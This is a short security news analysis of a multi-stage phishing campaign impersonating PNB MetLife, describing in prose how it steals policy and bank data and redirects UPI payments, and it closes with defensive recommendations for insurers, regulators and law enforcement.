PNB MetLife Phishing Attack: Multi-Stage Scheme Steals Data, Triggers UPI Payments

The rise of mobile‑first phishing exploits reflects a broader shift in cybercrime, where attackers capitalize on the ubiquity of SMS and instant messaging. By deploying counterfeit payment portals on free hosting services, threat actors bypass traditional security vetting and reach victims within seconds of message receipt. This low‑cost infrastructure, combined with real‑time Telegram bot exfiltration, creates a rapid feedback loop that amplifies fraud success rates, especially in markets where UPI payments dominate daily transactions.

Technically, the campaign chains several tactics: unvalidated form fields capture personal and policy data, which is immediately sent to Telegram bots via hard‑coded tokens. JavaScript then renders a UPI URI as a QR code, omitting the amount to compel manual entry, while clipboard‑abuse scripts silently replace copied text with attacker‑controlled UPI IDs. Deep‑link redirects push users into legitimate payment apps, completing the fraudulent transfer without raising suspicion. The second‑stage template adds a credential‑harvesting layer, prompting victims for bank details under the guise of policy updates, thereby expanding the attack from payment fraud to full‑scale financial credential theft.

For insurers and financial institutions, the incident highlights urgent gaps in customer education, channel monitoring, and third‑party hosting oversight. Implementing robust SMS filtering, enforcing multi‑factor authentication for policy changes, and collaborating with hosting providers to block malicious subdomains are essential defenses. Moreover, regulators must consider mandating rapid takedown protocols for phishing kits that exploit free platforms, while law enforcement should prioritize tracking Telegram bot activity to disrupt the exfiltration pipeline. Proactive measures can mitigate both direct monetary loss and reputational damage in an increasingly digitized insurance landscape.